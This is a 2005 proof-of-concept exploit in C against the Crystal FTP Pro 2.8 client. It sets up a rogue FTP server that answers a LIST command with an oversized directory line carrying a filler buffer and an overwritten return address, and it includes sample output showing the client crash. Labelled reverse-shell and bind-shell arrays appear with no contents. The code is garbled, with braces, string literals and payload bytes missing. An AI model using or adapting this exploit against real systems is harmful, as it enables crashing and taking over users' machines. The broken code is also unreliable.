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Crystal FTP Pro 2.8 PoC

NOTES: this piece of code is supposed to be PoC !
       -Target Buffer Size: 328-68-4 is about 254 bytes
       -RET Addr Space: 0x0012f496 to 0x0012f594
       -I tried some register jumps on WINXP PRO SP2
        (see offset1 and offset2)
       -Suggestions? Mail me! cybertronic@xxxxxxx
        Greetz fly to my girlfriend YASMIN H.

                   M                              ¼MMM
                   MMm                           ¼MMMM
                   M$$MMm                       ¼MMMMM.
                   MM$$MMMMm                   MMMMMMMM
                   `MM$$MMMMMMm               4MMMM$$MM
                    MMM$$MMMMMMMMm           ´MMMM$$MMM
                     MMM$$$MMMMMMMMm         mMMMM$MMMM
                      `MMM$$$MMMMMMMm        MMMM$MMMM´
                        MMMM$$$MMMMMMMm      MMM$$MMM´
                         `MMMMMMMMMMMMMm     MMMMMMM´
                           `MMMMMMMMMMMMMm   MMMMMM
                              `MMMMMMMMMMMM  MMMMM
                                 `MMMMMMMMMM MMMMM
                        4MMM<º >MMMMMMMMMMMMMMMMMMMM
                       MMMMMm_ mMMMMMMMMMMMMMMMMMMMM
       ¼Mn               ¼MMMMMMMMMMMMMMMMMMMMMMMMM            ¼Mnn
       nM                  `MMMMMMMMMMMMMMMMMMMMMM´              n¼
        `¼                    MMMMMMMMMMMMMMMMM¼                n´

     mMMM           nmM                         mM
   mM¼´  M          ' M                          n
 mM$                 nM                       n¼MMn¼Ä
4M               m   ¼M                      N   ¼                           ¼`
m¼       `n¼    mM  NM´                         NM
mM        mMm  nm   M´¼Mļ     n¼Mm   ¼n  xnÄ,  ¼   ¼n  xnÄ  ¼Mm   Mn n¼     nM 
 mM        `mMM´   nM     M   nM  ,`   ¼n´  y   M    ¼n´  y nM  ¼   nM  Ä    Ä  
  M¼         M'    ¼Ä      M  n.,´     nm      nM    nM     n   M   ¼   Ä    ¼  
   MM¼  mM   M    nM Ä    M´  n    ,  nM       ¼Ä   nM      M  nM   M   M   M´  
M   n
     MMM¼   M´   nM   MÄÄM     n¼nN  ¼M       nM   ¼M       `¼M´   ´¼  .N  nM   
         n´                                              cybertronic 2oo5
        ´                                        ________________

                MMMMMMMMm                            mMMMMMMM¼
             ´MM$MMMMMMMMMm                        mMMMMMMMMM$MM`
             MMMMMMMMMMMMMMMm                    mMMMMMMMMMMMMMMM

                ºÕÍÄúú  just want to say love you dad!  úúÄÍÕº


cybertronic@ctronic:~/poc> gcc -o crystal_expl crystal_expl.c
cybertronic@ctronic:~/poc> ./crystal_expl

### # # ###  ### ###  ### ###  ### #   # # ###
#   # # #  # #   #  #  #  #  # # # ##  # # #
#   # # ###  ### ###   #  ###  # # # # # # #
#    #  #  # #   # #   #  # #  # # #  ## # #
###  #  ###  ### #  #  #  #  # ### #   # # ###
                  ----------(c) 2005----------

Crystal FTP Pro v2.8 PoC

[*] Creating socket...OK!
[*] Listening...OK!
[*] Local IP:
[*] Incomming connection from:
[*] Sending Welcome Message...OK!
[*] Getting Login Information
--> Reading USER...OK!
--> Reading PASS...OK!
[*] Proceeding...
--> Reading cmd...OK!
--> Reading cmd...OK!
--> Reading cmd...OK!
[*] Entering Passive Mode...
[*] Creating socket...OK!
[*] Listening...OK!
[*] Passive connection established!
--> Reading cmd...OK!
[*] User is trying to use "LIST" command
[*] Creating bad packet...OK!
[*] Sending bad packet [328 bytes]...OK!
[*] Confirming...OK!
--> Reading cmd...FAILED! [client crashed]




#include <stdio.h>
#include <strings.h>
#include <signal.h>
#include <netinet/in.h>
#include <netdb.h>

#define RED     "\E[31m\E[1m"
#define GREEN   "\E[32m\E[1m"
#define YELLOW  "\E[33m\E[1m"
#define BLUE    "\E[34m\E[1m"
#define NORMAL  "\E[m"

#define PORT 1337
#define PASV 31337
#define BACKLOG 5

//316 bytes
unsigned char reverseshell[] =

//404 bytes
unsigned char bindshell[] =

void auth ( int s );
void header ();
void handle_cmd ( int s, int connfd, char* ip );
char* get_cmd ( int s );
int isip ( char* ip );

main ( int argc, char* argv[] )
        int listenfd, connfd;
        char* ip;
        pid_t childpid;
        socklen_t clilen;
        struct sockaddr_in cliaddr, servaddr;

        if ( argc != 2 )
                printf ( RED "[!] Usage: %s LOCAL_IP\n" NORMAL, argv[0] );
                exit ( 1 );
        if ( isip ( argv[1] ) != 0 )
                printf ( RED "[!] Enter Valid IP\n" NORMAL );
                exit ( 1 );
        system ( "clear" );
        header ();
        printf ( "[*] Creating socket..." );
        if ( ( listenfd = socket ( AF_INET, SOCK_STREAM, 0 ) ) == -1 )
                printf ( RED "FAILED!\n" NORMAL );
                exit ( 1 );
        printf ( GREEN "OK!\n" NORMAL );
        bzero ( &servaddr, sizeof ( servaddr ) );
        servaddr.sin_family = AF_INET;
        servaddr.sin_addr.s_addr = htonl ( INADDR_ANY );
        servaddr.sin_port = htons ( PORT );

        bind ( listenfd, ( struct sockaddr * ) &servaddr, sizeof ( servaddr ) );
        printf ( "[*] Listening..." );
        if ( listen ( listenfd, BACKLOG ) == -1 )
                printf ( RED "FAILED!\n" NORMAL );
                exit ( 1 );
        printf ( GREEN "OK!\n" NORMAL );

        for ( ; ; )
                clilen = sizeof ( cliaddr );

                if ( ( connfd = accept ( listenfd, ( struct sockaddr * ) 
&cliaddr, &clilen ) ) < 0 )
                        close ( listenfd );
                        printf ( RED "FAILED!\n" NORMAL );
                        exit ( 1 );

                if ( ( childpid = fork ( ) ) == 0 )
                        close ( listenfd );
                        ip = ( char* ) ( argv[1] );
                        printf ( "[*] Local IP: %s\n", ip );
                        printf ( "[*]" GREEN " Incomming connection from:\t 
%s\n" NORMAL, inet_ntoa ( cliaddr.sin_addr ) );
                        auth ( connfd );
                        handle_cmd ( connfd, ( int ) NULL, ip );
                close ( connfd );

isip ( char* ip )
        unsigned int a, b, c, d;

        sscanf ( ip, "%d.%d.%d.%d", &a, &b, &c, &d );
        if ( a < 1 || a > 255 )
                return ( 1 );
        if ( b < 0 || b > 255 )
                return ( 1 );
        if ( c < 0 || c > 255 )
                return ( 1 );
        if ( d < 0 || d > 255 )
                return ( 1 );
        return ( 0 );

auth ( int s )
        char user[32], pass[32], out[128];

        printf ( "[*] Sending Welcome Message..." );
        bzero ( &out, 128 );
        strcpy ( out, "220 cybertronicFTP v0.1\r\n" );
        if ( write ( s, out, strlen ( out ) ) <= 0 )
                printf ( RED "\t!!! ERROR: AUTHORIZATION FAILED !!!\n" NORMAL );
                exit ( 1 );
        printf ( GREEN "OK!\n" NORMAL );
        printf ( "[*] Getting Login Information\n" );
        printf ( YELLOW "--> Reading USER..." NORMAL );
        sleep ( 1 );
        if ( read ( s, user, 32 ) <= 0 )
                printf ( RED "FAILED\n" NORMAL );
                exit ( 1 );
        printf ( GREEN "OK!\n" NORMAL );
        sleep ( 1 );
        bzero ( &out, 128 );
        strcpy ( out, "331 Anonymous FTP server, send password though.\r\n" );
        if ( write ( s, out, strlen ( out ) ) <= 0 )
                printf ( RED "\t!!! ERROR: AUTHORIZATION FAILED !!!\n" NORMAL );
                exit ( 1 );
        printf ( YELLOW "--> Reading PASS..." NORMAL );
        sleep ( 1 );
        if ( read ( s, pass, 32 ) <= 0 )
                printf ( RED "FAILED\n" NORMAL );
                exit ( 1 );
        printf ( GREEN "OK!\n" NORMAL );
        sleep ( 1 );
        bzero ( &out, 128 );
        strcpy ( out, "230 Login successful!\r\n" );
        if ( write ( s, out, strlen ( out ) ) <= 0 )
                printf ( RED "\t!!! ERROR: AUTHORIZATION FAILED !!!\n" NORMAL );
                exit ( 1 );
        printf ( GREEN "    USER LOGGED IN!\n" NORMAL );
        printf ( "[*] Proceeding...\n" );

handle_cmd ( int s, int s2, char* ip )

        int listenfd, connfd;
        int i = 1;
        int tmp[4];
        char* a = NULL;
        pid_t childpid;
        socklen_t clilen;
        struct sockaddr_in cliaddr, servaddr;
        char out[128], evil[512], addr[32];
        char* cmd;
        unsigned long offset1 = 0x77e92828;
        unsigned long offset2 = 0x77e6271c;
        unsigned long offset3 = 0xdeadc0de;

        while ( 1 )
                cmd = get_cmd ( s );
                if ( strncmp ( cmd, "PWD", 3 ) == 0 )
                        bzero ( &out, 128 );
                        strcpy ( out, "257 \"/\" is current directory.\r\n" );
                        if ( write ( s, out, strlen ( out ) ) <= 0 )
                                printf ( RED "!!! ERROR: COMMAND HANDLING 
                                exit ( 1 );
                else if ( strncmp ( cmd, "CWD", 3 ) == 0 )
                        bzero ( &out, 128 );
                        strcpy ( out, "257 \"/\" is current directory.\r\n" );
                        if ( write ( s, out, strlen ( out ) ) <= 0 )
                                printf ( RED "!!! ERROR: COMMAND HANDLING 
                                exit ( 1 );
                else if ( strncmp ( cmd, "TYPE", 4 ) == 0 )
                        bzero ( &out, 128 );
                        strcpy ( out, "200 Type set to A..\r\n" );
                        if ( write ( s, out, strlen ( out ) ) <= 0 )
                                printf ( RED "!!! ERROR: COMMAND HANDLING 
                                exit ( 1 );
                else if ( strncmp ( cmd, "PASV", 4 ) == 0 )
                        bzero ( &addr, 32 );
                        a = (char*)strtok ( ip, "." );
                        tmp[0] = (int)a;
                        while ( a != NULL)
                                a = (char*)strtok ( NULL, "." );
                                tmp[i] = (int)a;
                        bzero ( &out, 128 );
                        sprintf( out, "227 Entering Passive Mode. 
(%s,%s,%s,%s,122,105).\r\n", tmp[0], tmp[1], tmp[2], tmp[3] );
                        if ( write ( s, out, strlen ( out ) ) <= 0 )
                                printf ( RED "!!! ERROR: COMMAND HANDLING 
                                exit ( 1 );
                        printf ( "[*] Entering Passive Mode...\n" );
                        printf ( "[*] Creating socket..." );
                        if ( ( listenfd = socket ( AF_INET, SOCK_STREAM, 0 ) ) 
== -1 )
                                printf ( RED "FAILED!\n" NORMAL );
                                exit ( 1 );
                        printf ( GREEN "OK!\n" NORMAL );
                        bzero ( &servaddr, sizeof ( servaddr ) );
                        servaddr.sin_family = AF_INET;
                        servaddr.sin_addr.s_addr = htonl ( INADDR_ANY );
                        servaddr.sin_port = htons ( PASV );

                        bind ( listenfd, ( struct sockaddr * ) &servaddr, 
sizeof ( servaddr ) );
                        printf ( "[*] Listening..." );
                        if ( listen ( listenfd, 1 ) == -1 )
                                printf ( RED "FAILED!\n" NORMAL );
                                exit ( 1 );
                        printf ( GREEN "OK!\n" NORMAL );
                        clilen = sizeof ( cliaddr );

                        if ( ( connfd = accept ( listenfd, ( struct sockaddr * 
) &cliaddr, &clilen ) ) < 0 )
                                close ( listenfd );
                                printf ( RED "FAILED!\n" NORMAL );
                                exit ( 1 );
                        close ( listenfd );
                        printf ( "[*]" GREEN " Passive connection 
established!\n" );
                        handle_cmd ( s, connfd, addr );
                else if ( strncmp ( cmd, "LIST", 4 ) == 0 )
                        printf ( "[*]" GREEN " User is trying to use \"LIST\" 
command\n" NORMAL );
                        printf ( "[*] Creating bad packet..." );
                        bzero ( &evil, 512 );
                        strcpy ( evil, "-rw-r--r--                              
29 Dec 22 13:37 cybertronic." );
                        memset ( evil+68, 'A', 254 );
                        strncat ( evil, ( unsigned char * ) &offset1, 4 );
                        strcat ( evil, "\r\n" );
                        printf ( GREEN "OK!\n" NORMAL );
                        bzero ( &out, 128 );
                        strcpy ( out, "150 Here comes the directory 
listing.\r\n" );
                        if ( write ( s, out, strlen ( out ) ) <= 0 )
                                printf ( RED "FAILED!" NORMAL);
                                exit ( 1 );
                        printf ( "[*] Sending bad packet [%i bytes]...", strlen 
( evil ) );
                        if ( write ( s2, evil, strlen ( evil ) ) <= 0 )
                                printf ( RED "FAILED!" NORMAL);
                                exit ( 1 );
                        printf ( GREEN "OK!\n" NORMAL);
                        bzero ( &out, 128 );
                        strcpy ( out, "226 Transfer ok\r\n" );
                        printf ( "[*] Confirming..." );
                        if ( write ( s, out, strlen ( out ) ) <= 0 )
                                printf ( RED "FAILED!" NORMAL);
                                exit ( 1 );
                        printf ( GREEN "OK!\n" NORMAL);
                        close ( s2 );
                        bzero ( &out, 128 );
                        strcpy ( out, "550 UNKNOWN COMMAND\r\n" );
                        if ( write ( s, out, strlen ( out ) ) <= 0 )
                                printf ( RED "!!! ERROR: COMMAND HANDLING 
                                exit ( 1 );

get_cmd ( int s )
        static char cmd[32];
        printf ( YELLOW "--> Reading cmd..." NORMAL );
        if ( read ( s, cmd, 32 ) <= 0 )
                printf ( RED "FAILED! [client crashed]" NORMAL);
                exit ( 1 );
        printf ( GREEN "OK!\n" NORMAL );
        return ( cmd );

header ()
        system ( "clear" );
        printf ( RED "### " GREEN "# # " YELLOW "###  " BLUE "### " RED "###  " 
GREEN "### " YELLOW "###  " BLUE "### " RED "#   # " GREEN "# " YELLOW "###\n" 
        printf ( RED "#   " GREEN "# # " YELLOW "#  # " BLUE "#   " RED "#  # " 
GREEN " #  " YELLOW "#  # " BLUE "# # " RED "##  # " GREEN "# " YELLOW "#  \n" 
        printf ( RED "#   " GREEN "# # " YELLOW "###  " BLUE "### " RED "###  " 
GREEN " #  " YELLOW "###  " BLUE "# # " RED "# # # " GREEN "# " YELLOW "#  \n" 
        printf ( RED "#   " GREEN " #  " YELLOW "#  # " BLUE "#   " RED "# #  " 
GREEN " #  " YELLOW "# #  " BLUE "# # " RED "#  ## " GREEN "# " YELLOW "#  \n" 
        printf ( RED "### " GREEN " #  " YELLOW "###  " BLUE "### " RED "#  # " 
GREEN " #  " YELLOW "#  # " BLUE "### " RED "#   # " GREEN "# " YELLOW "###\n" 
        printf ( RED "                cybertronic@xxxxxxx\n" NORMAL );
        printf ( RED "                  ----------(c) 2005----------\n\n" 
        printf ( "Crystal FTP Pro v2.8 PoC\n\n" );